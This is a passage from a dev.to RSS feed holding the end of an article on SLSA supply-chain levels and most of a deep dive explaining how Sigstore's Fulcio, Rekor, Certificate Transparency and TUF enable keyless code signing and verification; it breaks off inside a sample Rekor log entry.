&lt;p&gt;&lt;strong&gt;There is no transitive trust.&lt;/strong&gt; Just because an artifact hits SLSA Build L3 does not mean its dependencies are L3. SLSA levels apply strictly to a single artifact. Dependencies must be verified recursively.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not prevent typosquatting.&lt;/strong&gt; Installing &lt;code&gt;1odash&lt;/code&gt; instead of &lt;code&gt;lodash&lt;/code&gt; is entirely outside SLSA's jurisdiction. However, because Provenance hardcodes the source repo URL, it can be weaponized to verify, "Did this package actually come from the repo I think it did?"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not protect against malicious producers.&lt;/strong&gt; If the author intentionally writes malware into the codebase, SLSA won't stop it. Open-source visibility increases detection, but that's not a feature of SLSA itself.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;SLSA is a framework to mathematically verify "what source this software came from, and what exact process built it."&lt;/p&gt;

&lt;p&gt;The Build Track progressively raises the bar for forging Provenance: L1 guarantees it exists, L2 adds platform signatures, and L3 isolates the build environments. The Source Track aggressively locks down code change management, peaking at L4 with mandatory two-person reviews.&lt;/p&gt;

&lt;p&gt;Six years after SolarWinds, the ecosystem is rapidly catching up. GitHub Actions' &lt;code&gt;slsa-github-generator&lt;/code&gt;, npm's native Provenance, and PyPI's PEP 740 are hardening the supply chain infrastructure. The spec itself is actively evolving, with v1.1 and v1.2 dropping in 2025 to officially enshrine the Source Track.&lt;/p&gt;

&lt;p&gt;Will SLSA prevent every attack? No. But the difference between "we have absolutely no idea where this binary came from" and "we have mathematically verifiable evidence" is night and day—both for incident response times and the sheer wall attackers have to climb to compromise your software.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/spec/v1.2/" rel="noopener noreferrer"&gt;SLSA Specification v1.2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/blog/2025/04/slsa-v1.1" rel="noopener noreferrer"&gt;SLSA v1.1 Approved (2025-04)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/blog/2025/11/announce-slsa-v1.2" rel="noopener noreferrer"&gt;SLSA v1.2 Announcement (2025-11)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa" rel="noopener noreferrer"&gt;SLSA GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-github-generator" rel="noopener noreferrer"&gt;slsa-github-generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-verifier" rel="noopener noreferrer"&gt;slsa-verifier&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto Attestation Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.npmjs.com/generating-provenance-statements/" rel="noopener noreferrer"&gt;npm Provenance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pypi.org/posts/2024-11-14-pypi-now-supports-digital-attestations/" rel="noopener noreferrer"&gt;PyPI Digital Attestations (PEP 740)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/" rel="noopener noreferrer"&gt;SUNSPOT Technical Analysis (CrowdStrike)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://about.codecov.io/apr-2021-post-mortem/" rel="noopener noreferrer"&gt;Codecov Post-Mortem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openssf.org/" rel="noopener noreferrer"&gt;OpenSSF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>slsa</category>
      <category>openssf</category>
    </item>
    <item>
      <title>Sigstore Deep Dive: Unmasking the Magic Behind Keyless Verification</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 22 Apr 2026 14:51:44 +0000</pubDate>
      <link>https://dev.to/kanywst/sigstore-deep-dive-unmasking-the-magic-behind-keyless-verification-lmh</link>
      <guid>https://dev.to/kanywst/sigstore-deep-dive-unmasking-the-magic-behind-keyless-verification-lmh</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;In my previous article, "Supply Chain Security: A Deep Dive into SBOM and Code Signing," we took Cosign's keyless signing for a spin. You run &lt;code&gt;cosign sign&lt;/code&gt;, your browser pops up, you log in with GitHub, and boom—your container image is signed. No private key management. The moment the signing is done, the key is thrown away into the void.&lt;/p&gt;

&lt;p&gt;It was insanely convenient. But honestly? I had absolutely no idea what was happening under the hood.&lt;/p&gt;

&lt;p&gt;"If we threw the key away, how the hell can we verify it later?"&lt;br&gt;
"What's the point of a certificate that expires in 10 minutes?"&lt;br&gt;
"What exactly is a 'transparency log' recording anyway?"&lt;/p&gt;

&lt;p&gt;And fundamentally, why were they so obsessed with erasing the very concept of a "key"?&lt;/p&gt;

&lt;p&gt;Fast forward to 2026, and the software supply chain landscape is a complete bloodbath. Just look at what happened in March and April: attackers stole CI/CD credentials via Trivy GitHub Action tag poisoning, and immediately capitalized on the Claude Code source leak with package squatting. The attack trend has completely shifted from "exploiting code vulnerabilities" to "compromising the build process and CI/CD pipelines to inject malicious payloads." We're no longer asking, "Is this library safe?" We are asking, "Can you cryptographically prove this binary was built from the official repo, through the official CI?" If you can't, nobody is going to trust your artifact.&lt;/p&gt;

&lt;p&gt;Traditional code signing with GPG completely fell apart in the face of this reality. Long-lived private keys bled out of CI/CD server environment variables, ex-employees' keys were left rotting, and nobody—literally nobody—took CRLs (Certificate Revocation Lists) seriously because they were too slow.&lt;/p&gt;

&lt;p&gt;That's why Sigstore isn't just trying to be another tool. It wants to be the &lt;strong&gt;"Let's Encrypt for Code Signing."&lt;/strong&gt; Just as Let's Encrypt eradicated manual certificate management and forced the entire web to HTTPS, Sigstore wants to rip the concept of "key management" out of developers' hands. They are building a world of "Ubiquitous Code Signing," where signing artifacts happens as naturally as breathing.&lt;/p&gt;

&lt;p&gt;To bridge my initial confusion with this massive vision, I decided to completely tear down Sigstore's internals. How Fulcio issues certificates, how Rekor uses Merkle Trees to mathematically detect tampering, and how TUF guards the root of trust. As a follow-up to the previous "getting started" guide, today we are exposing the insane Rube Goldberg machine running behind the scenes just so we can throw our keys away.&lt;/p&gt;


&lt;h2&gt;
  
  
  1. Prerequisites: What You Need to Know
&lt;/h2&gt;

&lt;p&gt;Before we dive into Sigstore, let's nail down three concepts. Skip this if you already know them.&lt;/p&gt;
&lt;h3&gt;
  
  
  1.1 What is OIDC (OpenID Connect)?
&lt;/h3&gt;

&lt;p&gt;OIDC is a protocol where a third party proves "who you are." When you log in to Google or GitHub, that provider issues an &lt;strong&gt;ID Token&lt;/strong&gt;—a signed JSON Web Token (JWT). This JWT contains a cryptographically signed statement from the provider saying, "The owner of this email address successfully authenticated at this exact time."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5pt8dltx4hrgaaqi4b6h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5pt8dltx4hrgaaqi4b6h.png" alt="OIDC" width="673" height="577"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sigstore hijacks this exact mechanism for "signer identity proof." In other words, &lt;strong&gt;it replaces GPG keys with Google/GitHub account verification.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  1.2 The Basics of X.509 Certificates and CAs
&lt;/h3&gt;

&lt;p&gt;The X.509 certificates you know from HTTPS are electronic documents where a Certificate Authority (CA) guarantees that "this public key belongs to this entity."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hzo1dvdn9tgf0sd87em.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hzo1dvdn9tgf0sd87em.png" alt="x509" width="435" height="408"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The field inside the certificate that dictates "who this entity is" is called the &lt;strong&gt;SAN (Subject Alternative Name)&lt;/strong&gt;. It holds an email address or a URI. For a Let's Encrypt certificate, a domain name like &lt;code&gt;example.com&lt;/code&gt; sits in the SAN.&lt;/p&gt;

&lt;p&gt;Normal certificates live for a year or more. Because of that, you need massive revocation infrastructures like &lt;strong&gt;CRL (Certificate Revocation List)&lt;/strong&gt; or &lt;strong&gt;OCSP (Online Certificate Status Protocol)&lt;/strong&gt; just in case a private key leaks. But let's be real—they are complex, slow, and browsers frequently ignore them anyway.&lt;/p&gt;
&lt;h3&gt;
  
  
  1.3 What is Certificate Transparency (CT)?
&lt;/h3&gt;

&lt;p&gt;In 2011, a Dutch CA named DigiNotar got hacked, and bogus certificates for &lt;code&gt;*.google.com&lt;/code&gt; were minted. This nightmare birthed &lt;strong&gt;Certificate Transparency (CT)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The idea behind CT is brutally simple: &lt;strong&gt;"Force CAs to log every single certificate they issue into a public, append-only log so anyone can watch them."&lt;/strong&gt; If a certificate isn't in the log, the browser outright rejects it. This way, even if a CA gets compromised and mints fake certs, the community will catch it by monitoring the logs.&lt;/p&gt;

&lt;p&gt;Sigstore dragged this CT concept into the code-signing world. The certificates Fulcio issues are recorded in a CT Log, and every single signing event is recorded in Rekor (the transparency log).&lt;/p&gt;


&lt;h2&gt;
  
  
  2. The Big Picture of Sigstore
&lt;/h2&gt;

&lt;p&gt;With the prerequisites out of the way, let's look at the architecture. Sigstore isn't a single binary; it's a squad of four components working together.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6cb4lx4ams0794trv5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6cb4lx4ams0794trv5.png" alt="sigstore" width="800" height="262"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;In a Nutshell&lt;/th&gt;
&lt;th&gt;Traditional Equivalent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cosign&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The CLI doing the actual signing and verifying.&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;gpg sign&lt;/code&gt; / &lt;code&gt;gpg verify&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fulcio&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The CA issuing 10-minute certs based on OIDC identity.&lt;/td&gt;
&lt;td&gt;CAs like DigiCert&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rekor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The public, append-only ledger recording all signing events.&lt;/td&gt;
&lt;td&gt;Didn't exist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Securely distributes Fulcio's Root CA and Rekor's public keys.&lt;/td&gt;
&lt;td&gt;Manually curling/installing root certs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When we ran &lt;code&gt;cosign sign&lt;/code&gt; in the last article, it was orchestrating all of this behind the scenes. Let's rip open each component.&lt;/p&gt;


&lt;h2&gt;
  
  
  3. Fulcio: The 10-Minute Certificate Authority
&lt;/h2&gt;

&lt;p&gt;Let's start with Fulcio. This is where Sigstore's most radical idea lives.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why Limit Certificates to 10 Minutes?
&lt;/h3&gt;

&lt;p&gt;As mentioned earlier, legacy code signing relied on "long-lived private keys." This is a disaster because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You have to guard the private key with your life (using HSMs or Vault).&lt;/li&gt;
&lt;li&gt;If it leaks, you have to trigger the agonizing CRL/OCSP revocation process.&lt;/li&gt;
&lt;li&gt;Revocation checks are slow and clients often bypass them.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Fulcio annihilates this problem. &lt;strong&gt;"If we make the certificate's lifespan so short that an attacker has no time to exploit it, we don't need revocation management at all."&lt;/strong&gt; Ten minutes is just enough time to verify the OIDC token, issue the cert, perform the signature, and log it to Rekor. After that, the certificate turns into garbage.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lq3ynnyf6k30w3z0o0c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lq3ynnyf6k30w3z0o0c.png" alt="pki vs fulcio" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  The Internal Flow of Issuing a Certificate
&lt;/h3&gt;

&lt;p&gt;When a request hits Fulcio's &lt;code&gt;POST /api/v2/signingCert&lt;/code&gt;, a 7-step process kicks off before you get your cert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx7b72u55uo0u3a9f5j1m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx7b72u55uo0u3a9f5j1m.png" alt="internal flow" width="800" height="863"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's clarify Step 3: &lt;strong&gt;PoP (Proof of Possession)&lt;/strong&gt;. Before hitting Fulcio, Cosign generates an ephemeral key pair and signs the OIDC token's &lt;code&gt;sub&lt;/code&gt; claim with its private key. Fulcio verifies this signature using the provided public key. This proves "the guy asking for this cert actually owns the private key for it," preventing attackers from tying someone else's public key to their own cert.&lt;/p&gt;

&lt;p&gt;Step 6 submits it to a CT Log, as discussed in Section 1.3. If Fulcio's CA key is compromised and rogue certs are minted, clients will reject them because they aren't in the CT Log. &lt;strong&gt;Recording to the CT Log is the fail-safe to monitor Fulcio itself.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Certificate Chain Structure
&lt;/h3&gt;

&lt;p&gt;Fulcio builds a 3-tier certificate chain, identical to HTTPS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo847ilbd0vzb0fvv5x0w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo847ilbd0vzb0fvv5x0w.png" alt="Certificate Chain" width="425" height="580"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;pathlen: 0&lt;/code&gt; constraint ensures that the intermediate CA cannot spawn any downstream CAs. The Leaf cert is explicitly restricted to signing code.&lt;/p&gt;
&lt;h3&gt;
  
  
  SAN: Engraving the Signer's Identity
&lt;/h3&gt;

&lt;p&gt;Fulcio automatically populates the SAN based on the OIDC Provider.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;OIDC Provider&lt;/th&gt;
&lt;th&gt;SAN Type&lt;/th&gt;
&lt;th&gt;Example Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;Email&lt;/td&gt;
&lt;td&gt;&lt;code&gt;you@gmail.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub (Personal)&lt;/td&gt;
&lt;td&gt;Email&lt;/td&gt;
&lt;td&gt;&lt;code&gt;you@users.noreply.github.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo/.github/workflows/build.yml@refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitLab CI&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://gitlab.com/org/repo//.gitlab-ci.yml@refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;spiffe://example.org/workload&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes SA&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://kubernetes.io/namespaces/default/serviceaccounts/my-sa&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The GitHub Actions integration is particularly brilliant. Because the workflow file path and Git ref are burned directly into the SAN, &lt;strong&gt;you get an X.509-level guarantee that "this image was signed by this specific workflow, in this specific repo, from this specific branch."&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  OID Extensions: Hardcoding CI/CD Provenance
&lt;/h3&gt;

&lt;p&gt;Fulcio embeds custom OID extensions (Private Enterprise Number: &lt;code&gt;1.3.6.1.4.1.57264&lt;/code&gt;) into the cert. In CI/CD environments, the entire build provenance is explicitly recorded.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;OID (&lt;code&gt;.1.N&lt;/code&gt;)&lt;/th&gt;
&lt;th&gt;Field Name&lt;/th&gt;
&lt;th&gt;Content&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.8&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC Issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://token.actions.githubusercontent.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.9&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Build Signer URI&lt;/td&gt;
&lt;td&gt;Workflow path + ref&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.11&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Runner Environment&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;github-hosted&lt;/code&gt; or &lt;code&gt;self-hosted&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.12&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.13&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository Digest&lt;/td&gt;
&lt;td&gt;Commit SHA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.14&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository Ref&lt;/td&gt;
&lt;td&gt;&lt;code&gt;refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.20&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Build Trigger&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;push&lt;/code&gt;, &lt;code&gt;pull_request&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.21&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Run Invocation URI&lt;/td&gt;
&lt;td&gt;URL to the CI run&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;By just inspecting the Fulcio cert, you know &lt;em&gt;exactly&lt;/em&gt; which repo, commit, workflow, trigger, and runner signed the binary. GPG signatures could never even dream of doing this.&lt;/p&gt;


&lt;h2&gt;
  
  
  4. Rekor: The Transparency Log Powered by Merkle Trees
&lt;/h2&gt;

&lt;p&gt;If Fulcio is the CA minting certs, Rekor is the public ledger immutably recording every signing event.&lt;/p&gt;
&lt;h3&gt;
  
  
  The Problem Rekor Solves
&lt;/h3&gt;

&lt;p&gt;Fulcio and CT Logs leave one gaping hole: We need temporal proof that &lt;strong&gt;"this signature actually happened while the 10-minute certificate was still valid."&lt;/strong&gt; The certificate dies in 10 minutes, but if someone forges a signature using that cert 2 hours later, validating the cert chain alone won't tell you if the signature happened within the validity window.&lt;/p&gt;

&lt;p&gt;Rekor solves this. When it receives a signing event, it records the exact time as &lt;code&gt;integratedTime&lt;/code&gt; and signs it with its own private key. This acts as mathematical proof that the signature took place while the cert was alive.&lt;/p&gt;

&lt;p&gt;Furthermore, Rekor structures its log as a &lt;strong&gt;Merkle Tree&lt;/strong&gt;, allowing anyone to mathematically verify that historical entries haven't been tampered with.&lt;/p&gt;
&lt;h3&gt;
  
  
  What is a Merkle Tree?
&lt;/h3&gt;

&lt;p&gt;A Merkle Tree is a binary hash tree designed to efficiently verify data integrity. It's the exact same voodoo powering Bitcoin's blockchain.&lt;/p&gt;

&lt;p&gt;The logic is simple: Put data hashes in the leaf nodes, concatenate two hashes and hash them again, and bubble it all the way up to a single Root Hash.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08o2nxi9b3a195etg4qh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F08o2nxi9b3a195etg4qh.png" alt="merkle tree" width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the Root Hash is signed and made public, &lt;strong&gt;if you tamper with a single entry anywhere in the tree, the Root Hash completely changes and the signature breaks&lt;/strong&gt;. That's how append-only logs guarantee integrity.&lt;/p&gt;
&lt;h3&gt;
  
  
  Inclusion Proof: Mathematically Proving an Entry Exists
&lt;/h3&gt;

&lt;p&gt;Suppose we want to prove, "Is Entry 2 really in this log?" Doing it naively requires downloading the entire log, but with a Merkle tree, you only need &lt;strong&gt;O(log n)&lt;/strong&gt; hashes.&lt;/p&gt;

&lt;p&gt;To construct an Inclusion Proof for Entry 2, you only need the &lt;strong&gt;hashes of the sibling nodes along the path from Entry 2 to the Root&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pxk0j1lbzu8rp63u0xp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8pxk0j1lbzu8rp63u0xp.png" alt="Entry Exists" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Verification flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. H2 = Hash(Entry 2)              ← You calculate this locally
2. H23 = Hash(H2 + H3)             ← H3 comes from Rekor
3. Root' = Hash(H01 + H23)         ← H01 comes from Rekor
4. Check if Root' matches Rekor's signed Root Hash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a tree with 4 entries, you only need &lt;strong&gt;2 hashes&lt;/strong&gt; (H3 and H01). Even for a tree with a million entries, you only need about 20 hashes. That's the terrifying efficiency of O(log n).&lt;/p&gt;

&lt;h3&gt;
  
  
  The Data Written into Rekor
&lt;/h3&gt;

&lt;p&gt;Each entry (usually a &lt;code&gt;hashedrekord&lt;/code&gt; type) contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"apiVersion"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"0.0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"kind"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"hashedrekord"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"spec"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"data"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"hash"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"algorithm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"410dabcd6f1d..."&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"signature"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
